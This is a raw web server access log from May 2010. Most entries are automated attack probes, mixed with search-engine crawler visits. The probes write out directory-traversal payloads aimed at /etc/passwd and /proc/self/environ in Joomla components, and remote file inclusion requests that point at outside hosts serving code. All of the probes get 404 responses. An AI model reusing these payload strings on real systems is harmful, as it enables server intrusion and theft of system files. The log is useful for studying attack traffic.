74.54.63.138 - - [19/May/2010:12:21:51 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:12:21:51 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:12:21:51 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:12:21:52 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:12:21:53 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:12:21:53 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:12:21:53 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
75.126.213.59 - - [19/May/2010:12:23:06 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
75.126.213.59 - - [19/May/2010:12:23:06 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
75.126.213.59 - - [19/May/2010:12:23:06 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
87.250.255.243 - - [19/May/2010:12:24:13 -0500] "GET /logs/access_log.1273795200 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
75.126.213.59 - - [19/May/2010:12:24:39 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
75.126.213.59 - - [19/May/2010:12:24:39 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
75.126.213.59 - - [19/May/2010:12:24:39 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
70.38.71.147 - - [19/May/2010:12:25:35 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:12:25:35 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:12:25:35 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:12:25:58 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:12:25:58 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:12:25:59 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:12:26:18 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:12:26:18 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:12:26:18 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
87.106.26.60 - - [19/May/2010:12:26:49 -0500] "GET //errors.php?error=http://robots.interfree.it/id.jpg? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
87.106.26.60 - - [19/May/2010:12:26:49 -0500] "GET /logs//errors.php?error=http://robots.interfree.it/id.jpg? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
87.250.255.243 - - [19/May/2010:12:30:24 -0500] "GET /artwork/postcards.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [19/May/2010:12:33:50 -0500] "GET /logs/access_log.1273363200 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
91.121.20.59 - - [19/May/2010:12:38:42 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
216.129.119.43 - - [19/May/2010:12:39:42 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.13.46 - - [19/May/2010:12:41:05 -0500] "GET /logs/access_log.1203033600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.40 - - [19/May/2010:12:41:05 -0500] "GET /logs/access_log.1178582400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.229 - - [19/May/2010:12:42:05 -0500] "GET /logs/access_log.1166054400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [19/May/2010:12:43:27 -0500] "GET /logs/access_log.1272585600 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
91.121.20.59 - - [19/May/2010:12:43:31 -0500] "GET /logs/access_log.1273276800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
91.121.20.59 - - [19/May/2010:12:43:31 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.121.20.59 - - [19/May/2010:12:43:32 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.195.112.180 - - [19/May/2010:12:45:06 -0500] "GET /costume/thmb9.htm HTTP/1.0" 200 2227 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
208.115.111.248 - - [19/May/2010:12:50:57 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
216.67.225.61 - - [19/May/2010:12:51:09 -0500] "GET /logs/access_log.1273276800/index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
216.67.225.61 - - [19/May/2010:12:51:09 -0500] "GET /index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
216.67.225.61 - - [19/May/2010:12:51:09 -0500] "GET /logs/index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
216.67.225.61 - - [19/May/2010:12:51:15 -0500] "GET /index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
66.219.23.100 - - [19/May/2010:12:51:16 -0500] "GET /index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
174.121.67.233 - - [19/May/2010:12:51:19 -0500] "GET /index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
216.227.221.228 - - [19/May/2010:12:51:21 -0500] "GET /index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
66.219.23.100 - - [19/May/2010:12:51:24 -0500] "GET /logs/access_log.1273276800/index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
66.219.23.100 - - [19/May/2010:12:51:24 -0500] "GET /index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
66.219.23.100 - - [19/May/2010:12:51:24 -0500] "GET /logs/index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
216.227.221.228 - - [19/May/2010:12:51:26 -0500] "GET /logs/access_log.1273276800/index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
216.227.221.228 - - [19/May/2010:12:51:26 -0500] "GET /index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
216.227.221.228 - - [19/May/2010:12:51:26 -0500] "GET /logs/index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
174.121.67.233 - - [19/May/2010:12:51:28 -0500] "GET /logs/access_log.1273276800/index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
174.121.67.233 - - [19/May/2010:12:51:28 -0500] "GET /index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
174.121.67.233 - - [19/May/2010:12:51:28 -0500] "GET /logs/index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
79.174.72.86 - - [19/May/2010:12:51:52 -0500] "GET /index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
79.174.72.86 - - [19/May/2010:12:51:52 -0500] "GET /index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
87.250.255.243 - - [19/May/2010:12:51:57 -0500] "GET /logs/access_log.1273449600 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
91.121.20.59 - - [19/May/2010:12:52:00 -0500] "GET /logs/access_log.1273276800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
91.121.20.59 - - [19/May/2010:12:52:00 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.121.20.59 - - [19/May/2010:12:52:01 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
79.174.72.86 - - [19/May/2010:12:52:11 -0500] "GET /logs/access_log.1273276800/index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
79.174.72.86 - - [19/May/2010:12:52:11 -0500] "GET /logs/access_log.1273276800/index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
79.174.72.86 - - [19/May/2010:12:52:12 -0500] "GET /index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
79.174.72.86 - - [19/May/2010:12:52:12 -0500] "GET /index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
79.174.72.86 - - [19/May/2010:12:52:12 -0500] "GET /logs/index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
79.174.72.86 - - [19/May/2010:12:52:12 -0500] "GET /logs/index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
216.227.221.228 - - [19/May/2010:12:54:44 -0500] "GET /logs/access_log.1273276800/index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
216.227.221.228 - - [19/May/2010:12:54:44 -0500] "GET /index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
216.227.221.228 - - [19/May/2010:12:54:44 -0500] "GET /logs/index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
87.250.255.243 - - [19/May/2010:12:55:14 -0500] "GET /logs/access_log.1273708800 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
216.67.225.61 - - [19/May/2010:12:55:15 -0500] "GET /logs/access_log.1273276800/index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
174.121.67.233 - - [19/May/2010:12:55:15 -0500] "GET /logs/access_log.1273276800/index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
216.67.225.61 - - [19/May/2010:12:55:15 -0500] "GET /index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
216.67.225.61 - - [19/May/2010:12:55:15 -0500] "GET /logs/index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
174.121.67.233 - - [19/May/2010:12:55:16 -0500] "GET /index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
174.121.67.233 - - [19/May/2010:12:55:16 -0500] "GET /logs/index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
66.219.23.100 - - [19/May/2010:12:55:16 -0500] "GET /logs/access_log.1273276800/index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
66.219.23.100 - - [19/May/2010:12:55:16 -0500] "GET /index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
66.219.23.100 - - [19/May/2010:12:55:16 -0500] "GET /logs/index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
111.67.9.133 - - [19/May/2010:12:57:36 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.823"
79.174.72.86 - - [19/May/2010:12:57:39 -0500] "GET /logs/access_log.1273276800/index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
79.174.72.86 - - [19/May/2010:12:57:40 -0500] "GET /index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
79.174.72.86 - - [19/May/2010:12:57:40 -0500] "GET /logs/index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
79.174.72.86 - - [19/May/2010:12:57:42 -0500] "GET /logs/access_log.1273276800/index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
79.174.72.86 - - [19/May/2010:12:57:43 -0500] "GET /index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
79.174.72.86 - - [19/May/2010:12:57:43 -0500] "GET /logs/index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
87.250.255.243 - - [19/May/2010:12:59:17 -0500] "GET /logs/access_log.1271808000 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [19/May/2010:13:04:09 -0500] "GET /artwork/music.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [19/May/2010:13:09:02 -0500] "GET /logs/access_log.1271116800 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
212.26.227.88 - - [19/May/2010:13:11:18 -0500] "GET //include/bbs.lib.inc.php?site_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
212.26.227.88 - - [19/May/2010:13:11:18 -0500] "GET /logs/access_log.1265068800//include/bbs.lib.inc.php?site_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
212.26.227.88 - - [19/May/2010:13:11:18 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
207.46.199.39 - - [19/May/2010:13:12:35 -0500] "GET /logs/?N=D HTTP/1.1" 200 6146 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.26.227.88 - - [19/May/2010:13:12:53 -0500] "GET /logs/access_log.1265760000//include/bbs.lib.inc.php?site_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
207.46.13.53 - - [19/May/2010:13:13:36 -0500] "GET /logs/access_log.1198368000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [19/May/2010:13:14:43 -0500] "GET /artwork/jewelrybox.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
178.32.3.34 - - [19/May/2010:13:15:27 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
206.123.118.132 - - [19/May/2010:13:15:31 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
74.54.63.138 - - [19/May/2010:13:15:32 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:13:15:36 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
70.38.71.147 - - [19/May/2010:13:15:45 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
178.32.3.34 - - [19/May/2010:13:15:46 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
75.126.213.59 - - [19/May/2010:13:15:50 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:13:15:52 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:13:16:01 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:13:16:03 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
94.23.9.198 - - [19/May/2010:13:16:07 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
74.54.63.138 - - [19/May/2010:13:16:08 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
70.38.71.147 - - [19/May/2010:13:16:09 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
94.23.9.198 - - [19/May/2010:13:16:13 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
87.250.255.243 - - [19/May/2010:13:19:09 -0500] "GET /artwork/mirrors.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
74.54.63.138 - - [19/May/2010:13:21:28 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:13:21:28 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:13:21:28 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:13:21:49 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:13:21:49 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:13:21:49 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
207.46.13.98 - - [19/May/2010:13:22:06 -0500] "GET /logs/access_log.1219708800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
178.32.3.34 - - [19/May/2010:13:22:11 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:13:22:11 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/s